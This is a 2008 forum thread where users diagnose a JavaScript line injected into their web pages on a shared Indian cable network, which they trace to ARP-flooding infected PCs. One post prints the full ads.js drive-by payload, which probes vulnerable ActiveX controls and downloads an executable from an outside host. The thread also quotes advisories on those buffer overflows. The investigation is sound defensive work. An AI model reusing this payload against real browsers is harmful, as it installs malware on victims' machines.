Is my ISP injecting JS line ?
Moderator: General Moderators
Re: Is my ISP injecting JS line ?
by Jonah Bron » Thu Jan 17, 2008 5:53 pm
I'll bet there is just some cracker (negative hacker) out there reading this, and just laughing his head off.
Premature Developer | Nucleussystems.com
pyBookmarkSync | My Computer, Nucleus One | Dvorak Layout
Search first, ask questions later
pyBookmarkSync | My Computer, Nucleus One | Dvorak Layout
Search first, ask questions later
-
Jonah Bron - DevNet Resident
- Posts: 1029
- Joined: Thu Mar 15, 2007 6:28 pm
- Location: Sunny California
Re: Is my ISP injecting JS line ?
by anjanesh » Fri Jan 18, 2008 1:14 am
Wow ! More & more complaints on this issues - and most from India. Odd, that this worm doesnt affect gateways in other countries.
I have Apache httpd 2.2.6 on my WinXP PC and I keep checking the access & error log files.
Quite often I get a request from a local IP
Tried these IPs with your method of pinging them if ping <gateway> times out. Doesnt seem to work.
This might have worked 2-3 weeks back, right now the ISP or cable guys are upto something. I keep getting timed out at random intervals - all the time. Never steady enough to download a 5MB file @256kbps.
Im still facing terrible slowness. Unfortunately Im residing in an are awhere Sify dominates - recently Tata Indicom lines were established. YouTeleCom is not available in all sectors. Other major players like AirTel etc arent available in Navi Mumbai.
Luckily your ISP 'listens' to you. When I called tech support, and when the exec inquired at the higher level, the reply was always 'contact your hardware engineer' (to check for virus etc) !
First of all, most ISPs here provide internet through a local cable operator as a gateway and most of these gateways are on Windows - not Linux. And I wont be surprised if its running on WinXP or Win2000. Linux at the local customer-level is still a long way.Everah wrote:How can an ISP not protect their equipment enough to allow something like this to happen?
From Nerul here and same setup - using Sify though.chillpill_rohit wrote:and im a part of a local area network hosted by a local cable operator
I can never seem to talk to my cable operator in such depths. I can understand that he has no clue as to whats going on - because he keeps saying "??? ? ??? ?? ??? ?? ? ???? ???? ??? ??????"chillpill_rohit wrote:ME and our cable operator had no clue that its such a big problem only after reading your blogs
Not all the time - even at night I face same issues - guess some PC is still on at the time. But often I have noticed smooth connectivity during the night. But also a request timed out.chillpill_rohit wrote:1. The net never disconnects at nite... arnd after 10pm till early in the morning arnd 8 or 9am when usually offices start...i got many office networks inside my local area network.
This is news to me. Unfortunately I dont know any IPs in my network (its going to be tedious to try all out)chillpill_rohit wrote:2. Whenever net disconnects i ping to my gateway 172.25.0.1 and i get request timed out but thn at the same time if i ping to sum1 else on my network eg : 172.25.3.120 or 172.25.3.39 (rather they r dead or alive)
my ping to gateway 172.25.0.1 immediately starts responding and the net starts working as normal........again if it gets disconnected i do the same procedure.......
I have Apache httpd 2.2.6 on my WinXP PC and I keep checking the access & error log files.
Quite often I get a request from a local IP
10.12.165.90 - - [14/Jan/2008:22:45:52 +0530] "OPTIONS / HTTP/1.1" 200 -
....
10.12.165.133 - - [15/Jan/2008:20:56:38 +0530] "OPTIONS / HTTP/1.1" 200 -
...
10.12.165.133 - - [18/Jan/2008:10:50:36 +0530] "OPTIONS / HTTP/1.1" 200 -
....
10.12.165.133 - - [15/Jan/2008:20:56:38 +0530] "OPTIONS / HTTP/1.1" 200 -
...
10.12.165.133 - - [18/Jan/2008:10:50:36 +0530] "OPTIONS / HTTP/1.1" 200 -
Tried these IPs with your method of pinging them if ping <gateway> times out. Doesnt seem to work.
This might have worked 2-3 weeks back, right now the ISP or cable guys are upto something. I keep getting timed out at random intervals - all the time. Never steady enough to download a 5MB file @256kbps.
Redirect ? Are you sure ? I never got redirected. All my pages got injected with that JS line on top and tried to pull that JS file first. I hope thats what you meant by redirect.chillpill_rohit wrote:3. I have observed tht whenever my net gets connected the first site i get redirected to is http://g.asdafdgfgf.com/ads.js which u all r talking abt....
This may be true, but because of the randomness, its quite difficult to know. But what I dont understand is, how can a PC in the network send the html page to the gateway and then send it to the users. Shouldnt it be the other way round - gateway sends data to PCs and on the way one the infected PCs injects that JS line to other destined PCs - I suck at networking, but I thought this was how point-to-point works.chillpill_rohit wrote:2. Intrusion frm local network ... that is frm the PCs in my network which dont have proper antivirus and in which tht javascript is residing and continuously addressing the gateway 172.25.0.1 which we all share in our ip range......so the point is due such few infected PCs which i found are OFF during night time( when net works perfectly fine)......
Its the firewall thats required more than the anti-virus. But most cost which ppl wont buy.chillpill_rohit wrote:but wat remains is the internal attack which still is cloggin the gateway .........to solve this we have asked all the users in my ip range to install Nod32 or Norton to secure there PCs so tht it doesnt allow such scripts to run on their PCs and congest the gateway...........
Im still facing terrible slowness. Unfortunately Im residing in an are awhere Sify dominates - recently Tata Indicom lines were established. YouTeleCom is not available in all sectors. Other major players like AirTel etc arent available in Navi Mumbai.
Luckily your ISP 'listens' to you. When I called tech support, and when the exec inquired at the higher level, the reply was always 'contact your hardware engineer' (to check for virus etc) !
Anjanesh
-
anjanesh - DevNet Resident
- Posts: 1677
- Joined: Sat Dec 06, 2003 10:52 pm
- Location: Mumbai, India
Re: Is my ISP injecting JS line ?
by chillpill_rohit » Fri Jan 18, 2008 1:28 am
Anjanesh what i meant by redirecting is whenever i open any page on my IE or firefox the first link which my borwser redirects to is http://g.asdafdgfgf.com/ads.js but as i got Adblock Plus in firefox the site never gets a chance to open and then the original site which i desire to get open finally connects.
And yhea the problem is with both internal and external.....the PCs which do not have a good antivirus like norton and Nod32 let these JS to reside in them and from these PCs requests are send repeatedly to the gateway (and not other users) this makes the gateway to clog and hence net to get disconnected for all of us till the gateway is unclogged. The simple solution to this is ping the gateway and at the same time ping to any random ip within your range to evoke the gateway ...... its working perfectly fine.... till the next attack happens.........if u can meet me i can demonstrate this to you......... there is a direct train from Panvel to Andheri (i think u knw it)...... so u can hop on it and get to my place...... ill give u my detailed address through email..........by the way i got many friends from your locality coming to my college in chembur........and all are complaining about this same issue........lets meet up, what say?
And yhea the problem is with both internal and external.....the PCs which do not have a good antivirus like norton and Nod32 let these JS to reside in them and from these PCs requests are send repeatedly to the gateway (and not other users) this makes the gateway to clog and hence net to get disconnected for all of us till the gateway is unclogged. The simple solution to this is ping the gateway and at the same time ping to any random ip within your range to evoke the gateway ...... its working perfectly fine.... till the next attack happens.........if u can meet me i can demonstrate this to you......... there is a direct train from Panvel to Andheri (i think u knw it)...... so u can hop on it and get to my place...... ill give u my detailed address through email..........by the way i got many friends from your locality coming to my college in chembur........and all are complaining about this same issue........lets meet up, what say?
- chillpill_rohit
- Forum Newbie
- Posts: 15
- Joined: Thu Jan 17, 2008 3:54 am
Re: Is my ISP injecting JS line ?
by yochints » Fri Jan 18, 2008 10:02 am
chillpill_rohit !
exactly same issues, similar ip addresses .. similar gateways ..
I have also been trying to help out my local cable guy, who has no clue whatsoever !
Anyways to help anyone who requires it, everytime the connection disconnects (this is happening too frequently at my end due to the virus broadcasting and flooding the routers) if you clear the arp cache on your windows pc (by either repair or the arp -d * command) the network starts working.
I got frustrated repairing the connection each and everytime ! .. so finally I have written a program to keep checking up the connection status every 30 seconds and repair it automatically if required ! .. now I don't need to do anything
.. i have a log with disconnections every 10 minutes ..
now its my cable guy who is surprised how i am managing to make my connection work, when the entire area is down for almost a week now. !
exactly same issues, similar ip addresses .. similar gateways ..
I have also been trying to help out my local cable guy, who has no clue whatsoever !
Anyways to help anyone who requires it, everytime the connection disconnects (this is happening too frequently at my end due to the virus broadcasting and flooding the routers) if you clear the arp cache on your windows pc (by either repair or the arp -d * command) the network starts working.
I got frustrated repairing the connection each and everytime ! .. so finally I have written a program to keep checking up the connection status every 30 seconds and repair it automatically if required ! .. now I don't need to do anything
.. i have a log with disconnections every 10 minutes ..now its my cable guy who is surprised how i am managing to make my connection work, when the entire area is down for almost a week now. !
- yochints
- Forum Newbie
- Posts: 5
- Joined: Wed Jan 16, 2008 12:45 am
Re: Is my ISP injecting JS line ?
by VladSun » Fri Jan 18, 2008 10:08 am
yochints wrote:if you clear the arp cache on your windows pc (by either repair or the arp -d * command) the network starts working.
Maybe it will help if you set a static ARP entry for your gateway IP.
-
VladSun - DevNet Master
- Posts: 3631
- Joined: Wed Jun 27, 2007 9:44 am
- Location: Sofia, Bulgaria
Re: Is my ISP injecting JS line ?
by anjanesh » Fri Jan 18, 2008 10:50 am
Care to share that code ?yochints wrote:I got frustrated repairing the connection each and everytime ! .. so finally I have written a program to keep checking up the connection status every 30 seconds and repair it automatically if required ! .. now I don't need to do anything
Btw, this is the JS code (ads.js) thats trying to execute
if (document.cookie.indexOf('OKSUN') == -1)
{
try
{
var e;
var ado = (document.createElement("object"));
ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as = ado.createobject("Adodb.Stream", "")
}
catch(e){};
finally
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = 'OKSUN=SUN;path=/;expires='+expires.toGMTString();
document.write("<\/script>");
if(e != "[object Error]")
{
document.write("<\/script>")
}
else
{
try
{
var f;
var storm = new ActiveXObject("MPS.StormPlayer")
}
catch(f){};
finally
{
if (f != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var g;
var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
}
catch(g){};
finally
{
if (g != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var h;
var thunder = new ActiveXObject("DPClient.Vod")
}
catch(h){};
finally
{
if (h != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var i;
var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
}
catch(i){};
finally
{
if (i != "[object Error]")
{
document.write("")
}
}
try
{
var j;
var obj = new ActiveXObject("BaiduBar.Tool")
}
catch(j){};
finally
{
if (j != "[object Error]")
{
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
document.write("")
}
}
if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
{
document.write("")
}
}
}
}
{
try
{
var e;
var ado = (document.createElement("object"));
ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as = ado.createobject("Adodb.Stream", "")
}
catch(e){};
finally
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = 'OKSUN=SUN;path=/;expires='+expires.toGMTString();
document.write("<\/script>");
if(e != "[object Error]")
{
document.write("<\/script>")
}
else
{
try
{
var f;
var storm = new ActiveXObject("MPS.StormPlayer")
}
catch(f){};
finally
{
if (f != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var g;
var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
}
catch(g){};
finally
{
if (g != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var h;
var thunder = new ActiveXObject("DPClient.Vod")
}
catch(h){};
finally
{
if (h != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var i;
var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
}
catch(i){};
finally
{
if (i != "[object Error]")
{
document.write("")
}
}
try
{
var j;
var obj = new ActiveXObject("BaiduBar.Tool")
}
catch(j){};
finally
{
if (j != "[object Error]")
{
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
document.write("")
}
}
if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
{
document.write("")
}
}
}
}
Anyone has any clue as to what this code might be doing ?
It obviously seems to be creating quite a number of ActiveXObjects but this totally harmless in FF right ?
Anjanesh
-
anjanesh - DevNet Resident
- Posts: 1677
- Joined: Sat Dec 06, 2003 10:52 pm
- Location: Mumbai, India
Re: Is my ISP injecting JS line ?
by chillpill_rohit » Fri Jan 18, 2008 4:00 pm
People i got something new to share..........this ads.exe file which seems to be getting downloaded on unprotected computers in our local area network through the above JS can have following effects :-
ADS.EXE has been seen to perform the following behavior(s):
* Executes a Process
* Creates a TCP port which listens and is available for communication initiated by other computers
* The Process is packed and/or encrypted using a software packing process
ADS.EXE has been the subject of the following behavior(s):
* Created as a new Background Service on the machine
* Created as a process on disk
* Executed as a Process
* Added as a Registry auto start to load Program on Boot up
for further information chck this site http://www.prevx.com/filenames/21101812 ... S.EXE.html
and also chck this out http://www.spywaredata.com/spyware/malware/ads.exe.php
ADS.EXE has been seen to perform the following behavior(s):
* Executes a Process
* Creates a TCP port which listens and is available for communication initiated by other computers
* The Process is packed and/or encrypted using a software packing process
ADS.EXE has been the subject of the following behavior(s):
* Created as a new Background Service on the machine
* Created as a process on disk
* Executed as a Process
* Added as a Registry auto start to load Program on Boot up
for further information chck this site http://www.prevx.com/filenames/21101812 ... S.EXE.html
and also chck this out http://www.spywaredata.com/spyware/malware/ads.exe.php
- chillpill_rohit
- Forum Newbie
- Posts: 15
- Joined: Thu Jan 17, 2008 3:54 am
Re: Is my ISP injecting JS line ?
by chillpill_rohit » Fri Jan 18, 2008 4:31 pm
One very important thing i need to add is........ i have been in contact with my cable operator and even the ISP interface tech support people on this issue.......i have talked to anjanesh all about it..........
Firstly the interface ISP people failed to acknowledge our problem......after few persistent request from us they were ready to lissen to what we had to say.........actually we had asked them to block this ip 222.216.28.25 (which is the root cause of this whole issue refer my earlier posts where i have mentioned it) from their main DNS servers through which our line was getting connected.......than i tried
tracert 222.216.28.25
which gave me only 1st hop till my gateway and then it was dead which means that the ip was sucessfully blocked from their servers.....
Then they asked us to clear our cache and all other temporary data and reboot and then try and connect to net........what came to our surprise was that the JS was still getting injected......... this was very shocking......the interface people tried to solve this problem but today atleast we didnt hit any success.....
Now to check if our PC was infected or not we tried this.........we logged into vibes online (another ISP having other ip config) from the same machine and then started surfing net........and that JS was no more to be seen.......so it was quiet evident that nothing is wrong with our PC.......coz its already blocking the JS and now allowing it to run.........
So what does all this point to?
Simple........ something is wrong in our local area network itself...... in some of the computers which are unprotected that above mentioned JS is getting run and tht ads.exe is getting downloaded and hence executed ........ as i have mentioned that this ads.exe " Creates a TCP port which listens and is available for communication initiated by other computers " so this is probably the port which is clogging the gateway and hence making our connectivity to net disrupted........ but still my this point is yet to be proved.......so tmmrw ill again work on it and find out the infected PCs on my network and try and see if any such ads.exe file is running any kind of service on their PC or not...........WISH ME LUCK buddies.........this problem has got a shorter life now........its soon gonna get resolved and i assure u all a HAPPY ENDING to this thread
Regards,
Rohit Jain
(not the only affected user :p )
Firstly the interface ISP people failed to acknowledge our problem......after few persistent request from us they were ready to lissen to what we had to say.........actually we had asked them to block this ip 222.216.28.25 (which is the root cause of this whole issue refer my earlier posts where i have mentioned it) from their main DNS servers through which our line was getting connected.......than i tried
tracert 222.216.28.25
which gave me only 1st hop till my gateway and then it was dead which means that the ip was sucessfully blocked from their servers.....
Then they asked us to clear our cache and all other temporary data and reboot and then try and connect to net........what came to our surprise was that the JS was still getting injected......... this was very shocking......the interface people tried to solve this problem but today atleast we didnt hit any success.....
Now to check if our PC was infected or not we tried this.........we logged into vibes online (another ISP having other ip config) from the same machine and then started surfing net........and that JS was no more to be seen.......so it was quiet evident that nothing is wrong with our PC.......coz its already blocking the JS and now allowing it to run.........
So what does all this point to?
Simple........ something is wrong in our local area network itself...... in some of the computers which are unprotected that above mentioned JS is getting run and tht ads.exe is getting downloaded and hence executed ........ as i have mentioned that this ads.exe " Creates a TCP port which listens and is available for communication initiated by other computers " so this is probably the port which is clogging the gateway and hence making our connectivity to net disrupted........ but still my this point is yet to be proved.......so tmmrw ill again work on it and find out the infected PCs on my network and try and see if any such ads.exe file is running any kind of service on their PC or not...........WISH ME LUCK buddies.........this problem has got a shorter life now........its soon gonna get resolved and i assure u all a HAPPY ENDING to this thread
Regards,
Rohit Jain
(not the only affected user :p )
- chillpill_rohit
- Forum Newbie
- Posts: 15
- Joined: Thu Jan 17, 2008 3:54 am
Re: Is my ISP injecting JS line ?
by anjanesh » Sat Jan 19, 2008 12:48 am
From secunia.com
Related : xforce.iss.net, securityvulns.comZhenHan.Liu has discovered some vulnerabilities in Baofeng Storm, which can be exploited by malicious people to compromise a user's system.
1) A boundary error in sparser.dll can be exploited to cause a stack-based buffer overflow via e.g. an overly long (greater than 260 bytes) string passed as argument to the "rawParse()" and "advancedOpen()" methods and "URL" property within the MPS.StormPlayer.1 ActiveX control (mps.dll), or via a specially crafted .SMPL file containing an overly long (greater than 260 bytes) "path" string.
2) A boundary error within the MPS.StormPlayer.1 ActiveX control (mps.dll) when handling the "isDVDPath()" method can be exploited to cause a stack-based buffer overflow via an overly long (greater than 260 bytes) string passed as argument to the affected method.
3) Boundary errors within the MPS.StormPlayer.1 ActiveX control (mps.dll) when handling the "backImage()" and "titleImage()" properties can be exploited to cause heap-based buffer overflows by assigning an overly long (greater than 260 bytes) string to the affected properties.
Successful exploitation of the vulnerabilities allow execution of arbitrary code.
From secunia
7jdg has reported a vulnerability in Xunlei Thunder, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to a boundary error in the DPClient.Vod.1 ActiveX control (DapPlayer_Now.dll) when handling arguments passed to the "DownURL2()" method. This can be exploited to cause a buffer overflow by passing an overly long argument to the affected method.
Successful exploitation allows execution of arbitrary code.
The vulnerability is reported in version 5.6.9.344. Other versions may also be affected.
From secunia
Some vulnerabilities have been discovered in Ourgame GLWorld, which can be exploited by malicious people to compromise a user's system.
The vulnerabilities are caused due to boundary errors within the GLCHAT.GLChatCtrl.1 ActiveX control (GLChat.ocx) when handling the "ConnectAndEnterRoom()" method. These can be exploited to cause stack-based buffer overflows by passing overly long arguments to the affected method.
Successful exploitation allows execution of arbitrary code.
The vulnerabilities are confirmed in version 2.7.0.8 including GLChat.ocx version 2.5.1.32. Other versions may also be affected.
The biggest threat is the BaiduBar.Tool ActiveXObject object because it tries to download an exe file.
var obj = new ActiveXObject("BaiduBar.Tool")
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
According to wikipedia,
The MP3 search of Baidu has been criticized by the Office of the United States Trade Representative's Special 301 report by stating that “Baidu as the largest of an estimated seven or more China-based ‘MP3 search engines’ offering deep links to song files for downloads or streaming.
Thats probably why Baidu is used by many - download mp3s !
Anjanesh
-
anjanesh - DevNet Resident
- Posts: 1677
- Joined: Sat Dec 06, 2003 10:52 pm
- Location: Mumbai, India
Re: Is my ISP injecting JS line ?
by Merge9 » Sat Jan 19, 2008 2:05 pm
Latest from me. It seems that, contrary to what I reported earlier, when I go through a secure proxy server the code is no longer added to my html. I thought I could safely ifnore this little piece of offending code as I had set the site in my host file to point to 127.0.0.1 and my virus software was dealing with it BUT adding that piece of code still affects 'some' pages I view but causing things like the font to be larger or some other formatting of the page error. Worse it must be getting added to even programs code that uses the net as one of my key programs that accesses an API does not work - it does work when I go through proxy with it.
So it seems the code it getting added from the server rather than my computer!!!! (this really is weird as I am the only computer on my network getting it and I am on a dynamicaly allocated IP from my wireless router). If this is so WHY am I the only one seems to be reporting this in the UK and on Virgin. Surely this would be more widespread.
I eagerly await some solution for this. Till then I will run through a proxy server - hardly a solution!!
Is there some way I can access the prerender engine of my browser and add some java script that removes the offending code before it renders??
Richard
So it seems the code it getting added from the server rather than my computer!!!! (this really is weird as I am the only computer on my network getting it and I am on a dynamicaly allocated IP from my wireless router). If this is so WHY am I the only one seems to be reporting this in the UK and on Virgin. Surely this would be more widespread.
I eagerly await some solution for this. Till then I will run through a proxy server - hardly a solution!!
Is there some way I can access the prerender engine of my browser and add some java script that removes the offending code before it renders??
Richard
- Merge9
- Forum Newbie
- Posts: 8
- Joined: Sat Jan 12, 2008 7:37 pm
Re: Is my ISP injecting JS line ?
by anjanesh » Sat Jan 19, 2008 2:27 pm
I thought it was CSS that wasnt getting parsed properly because of the missing JavaScript.Merge9 wrote:I thought I could safely ifnore this little piece of offending code as I had set the site in my host file to point to 127.0.0.1 and my virus software was dealing with it BUT adding that piece of code still affects 'some' pages I view but causing things like the font to be larger or some other formatting of the page error.
Any clue if this is getting added to incoming bytes to ports other than 80 ? I am facing issues FTP, SFTP quite often, but no clue if the JS line is getting injected in those requests too.Merge9 wrote:Worse it must be getting added to even programs code that uses the net as one of my key programs that accesses an API does not work - it does work when I go through proxy with it.
Thats the weirdest part - how come this is not common enough.Merge9 wrote:So it seems the code it getting added from the server rather than my computer!!!! (this really is weird as I am the only computer on my network getting it and I am on a dynamicaly allocated IP from my wireless router). If this is so WHY am I the only one seems to be reporting this in the UK and on Virgin. Surely this would be more widespread.
AdBlock Plus extension for FireFox.Merge9 wrote:Is there some way I can access the prerender engine of my browser and add some java script that removes the offending code before it renders??
Rohit has some interesting update on this. He got to his local cable operator and checked the log files.
Apparently, there are whole lot of bytes sent out when compared to incoming bytes and the MAC address is being changed to 00-80-48-40-90-CC for ALL PCs when the exploit is active.
The MAC address and the IP address map is stored at the local cable operator's area net is refused if either one are changed. And yet, all these customers are getting their MAC address changed to a same value !
Anjanesh
-
anjanesh - DevNet Resident
- Posts: 1677
- Joined: Sat Dec 06, 2003 10:52 pm
- Location: Mumbai, India
Re: Is my ISP injecting JS line ?
by yochints » Mon Jan 21, 2008 1:15 am
Everah | Please use [code] tags when posting code in the forums. To post a particular type of code, use a syntax similar to [code={lang}] where lang is the language you are using. Thanks.
this is a very small and trivial code, actually but worked for me for a while at least ... vb.net (.net 2.0) !
unfortunately i don't have much idea about setting up static arp
and yes i already know about references to RBN, indonesia, 6.gif and ads.jpg, and i am quite sure it has to be coming from some gateway in between .. and not from our machines/ servers or browsers ..
Everah | Please use [code] tags when posting code in the forums. To post a particular type of code, use a syntax similar to [code={lang}] where lang is the language you are using. Thanks.
this is a very small and trivial code, actually but worked for me for a while at least ... vb.net (.net 2.0) !
Public Class Form1
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
test_and_login()
End Sub
Private Sub test_and_login()
Try
If My.Computer.Network.Ping("www.google.com", 1000) Then
Label4.Text = "Success"
Else
Label4.Text = "Failed"
Shell("arp -d *")
TextBox1.Text = "Failed - " & Now & Environment.NewLine & TextBox1.Text
End If
Label2.Text = Now
Catch ex As Exception
End Try
End Sub
End Class
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
test_and_login()
End Sub
Private Sub test_and_login()
Try
If My.Computer.Network.Ping("www.google.com", 1000) Then
Label4.Text = "Success"
Else
Label4.Text = "Failed"
Shell("arp -d *")
TextBox1.Text = "Failed - " & Now & Environment.NewLine & TextBox1.Text
End If
Label2.Text = Now
Catch ex As Exception
End Try
End Sub
End Class
unfortunately i don't have much idea about setting up static arp
and yes i already know about references to RBN, indonesia, 6.gif and ads.jpg, and i am quite sure it has to be coming from some gateway in between .. and not from our machines/ servers or browsers ..
Everah | Please use [code] tags when posting code in the forums. To post a particular type of code, use a syntax similar to [code={lang}] where lang is the language you are using. Thanks.
- yochints
- Forum Newbie
- Posts: 5
- Joined: Wed Jan 16, 2008 12:45 am
Re: Is my ISP injecting JS line ?
by chillpill_rohit » Mon Jan 21, 2008 4:06 am
EUREKA !!
The Solution is found and working well. First let me tell you the real culprits creating this problem in our networks...
And the culprit is not the gateway or the ISP servers....but some of the computers within our own local area networks..........and not necessarily of the same ip pool but of the ip pools which share the same servers.........and this was possible to prove only because of the co operation from my local cable operator and our ISP (IOL Broadband) and our tech team ofcourse..........
Now the whole problem is created by a bunch of computers where this particular JS found a way in(due to lack of any protection by antivirus) and installed a couple of deadly trojan files infecting the Network services of those computers in a way that the these computers send heavy broadcast to the shared servers in a way of multiple ARP requests at a very high frequency thus clogging our requests to the gateway..........hence to solve this we isolated these PCs from our network for sometime and then found out to our surprise that the JS had vanished and the internet was working at full speed...........then again we inserted those PCs into our network to find that the JS was again appearing and the network had slowed down and ultimately got clogged...........
Now how we proved it?..........we were working hard to find out from which PCs these broadcast were taking place ............being sunday many offices and other PCs were inactive barring a few...........so we were fortunate enuff to find out one PC sending these broadcasts to the server........we got his address from the cable operator and visited his place.........to find out what didnt surprise us much.........his pc was having absolutely no protection in form of any antivirus or anti-spyware or adware..........moreover he was using Internet Explorer to browse through the net which can activate an ActiveX object created by the JS which anjanesh has proved in his decoded scripts.........even the user got many alerts (to block/unblock particular contents on the pages) which due to his ignorance he always used to unblock...........
Now we scanned his PC with Nod32 to find more than 1500 different infected files in his windows folder........the log of the scan ill be sharing with u all in the next post........once his PC was disconnected from net we found no JS appearing and the net was working perfectly fine.........is PC was cleaned and then again connected to network which didnt clogg till 8 or 9pm in evening..........then some other infected PCs started clogging the network and now we are one by one isolating such PCs and cleaning them with Nod32 updated version..........
Another important thing...........the ISP servers had no role in this entire clogging thing........we proved this also by connecting our machine directly to the line coming from the servers and isolating our network from it.........we found absolutely no JS and net was working fine ..........but then when we included the network the JS started appearing the net speeds slowed down and ultimately the network got clogged.........we had also asked the ISP tech team to check if their servers were infected or not.......they found no such viruses on their systems.....
so our point is proved.........the culprits are within the local area network itself
This is how our problem has been solved and so can be urs......now to find out which PCs on your network are cloggin the servers..........just download this software Ethersnoop from http://www.arechisoft.com/ and install it.......now configure it as i say.......in the next post.
The Solution is found and working well. First let me tell you the real culprits creating this problem in our networks...
And the culprit is not the gateway or the ISP servers....but some of the computers within our own local area networks..........and not necessarily of the same ip pool but of the ip pools which share the same servers.........and this was possible to prove only because of the co operation from my local cable operator and our ISP (IOL Broadband) and our tech team ofcourse..........
Now the whole problem is created by a bunch of computers where this particular JS found a way in(due to lack of any protection by antivirus) and installed a couple of deadly trojan files infecting the Network services of those computers in a way that the these computers send heavy broadcast to the shared servers in a way of multiple ARP requests at a very high frequency thus clogging our requests to the gateway..........hence to solve this we isolated these PCs from our network for sometime and then found out to our surprise that the JS had vanished and the internet was working at full speed...........then again we inserted those PCs into our network to find that the JS was again appearing and the network had slowed down and ultimately got clogged...........
Now how we proved it?..........we were working hard to find out from which PCs these broadcast were taking place ............being sunday many offices and other PCs were inactive barring a few...........so we were fortunate enuff to find out one PC sending these broadcasts to the server........we got his address from the cable operator and visited his place.........to find out what didnt surprise us much.........his pc was having absolutely no protection in form of any antivirus or anti-spyware or adware..........moreover he was using Internet Explorer to browse through the net which can activate an ActiveX object created by the JS which anjanesh has proved in his decoded scripts.........even the user got many alerts (to block/unblock particular contents on the pages) which due to his ignorance he always used to unblock...........
Now we scanned his PC with Nod32 to find more than 1500 different infected files in his windows folder........the log of the scan ill be sharing with u all in the next post........once his PC was disconnected from net we found no JS appearing and the net was working perfectly fine.........is PC was cleaned and then again connected to network which didnt clogg till 8 or 9pm in evening..........then some other infected PCs started clogging the network and now we are one by one isolating such PCs and cleaning them with Nod32 updated version..........
Another important thing...........the ISP servers had no role in this entire clogging thing........we proved this also by connecting our machine directly to the line coming from the servers and isolating our network from it.........we found absolutely no JS and net was working fine ..........but then when we included the network the JS started appearing the net speeds slowed down and ultimately the network got clogged.........we had also asked the ISP tech team to check if their servers were infected or not.......they found no such viruses on their systems.....
so our point is proved.........the culprits are within the local area network itself
This is how our problem has been solved and so can be urs......now to find out which PCs on your network are cloggin the servers..........just download this software Ethersnoop from http://www.arechisoft.com/ and install it.......now configure it as i say.......in the next post.
Last edited by chillpill_rohit on Mon Jan 21, 2008 4:53 am, edited 1 time in total.
- chillpill_rohit
- Forum Newbie
- Posts: 15
- Joined: Thu Jan 17, 2008 3:54 am
Re: Is my ISP injecting JS line ?
by chillpill_rohit » Mon Jan 21, 2008 4:21 am
Just install the above software.............run it...........go to TOOLS>SETUP
and set ur buffer size to more than 5MB.........now come back to the main
window.........and click on PACKET FILTER option.............tick all the other
protocols like ICMP,TCP,UDP,OTHERS and just leave ARP unticked..........now
select ur LAN CARD from the drop down combo box just left to the PACKET
FILTER option........and now click on the leftmost first button to start sniffing ur network..........wait for some time and ull see a list of ARP requests
coming from some physical address........click on the physical address
which is getting repeated regularly and chck its details like its IP on the
left hand side of ur window..........if any problem do contact me.
and set ur buffer size to more than 5MB.........now come back to the main
window.........and click on PACKET FILTER option.............tick all the other
protocols like ICMP,TCP,UDP,OTHERS and just leave ARP unticked..........now
select ur LAN CARD from the drop down combo box just left to the PACKET
FILTER option........and now click on the leftmost first button to start sniffing ur network..........wait for some time and ull see a list of ARP requests
coming from some physical address........click on the physical address
which is getting repeated regularly and chck its details like its IP on the
left hand side of ur window..........if any problem do contact me.
- Attachments
-
- The log of ethersnoop.........clearly shows a heavy arp request frm 10.54.1.185....which when isolated from the network...the JS disappeared and the network was normal again !
- ehterlog.JPG (186.07 KiB) Viewed 1369 times
Last edited by chillpill_rohit on Mon Jan 21, 2008 4:57 am, edited 1 time in total.
- chillpill_rohit
- Forum Newbie
- Posts: 15
- Joined: Thu Jan 17, 2008 3:54 am
Re: Is my ISP injecting JS line ?
by chillpill_rohit » Mon Jan 21, 2008 4:35 am
The logs of the virus scan performed using Nod32 on one of the infected PCs.......
1/20/2008 5:53:47 PM Real-time file system protection file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:32:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:32:27 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
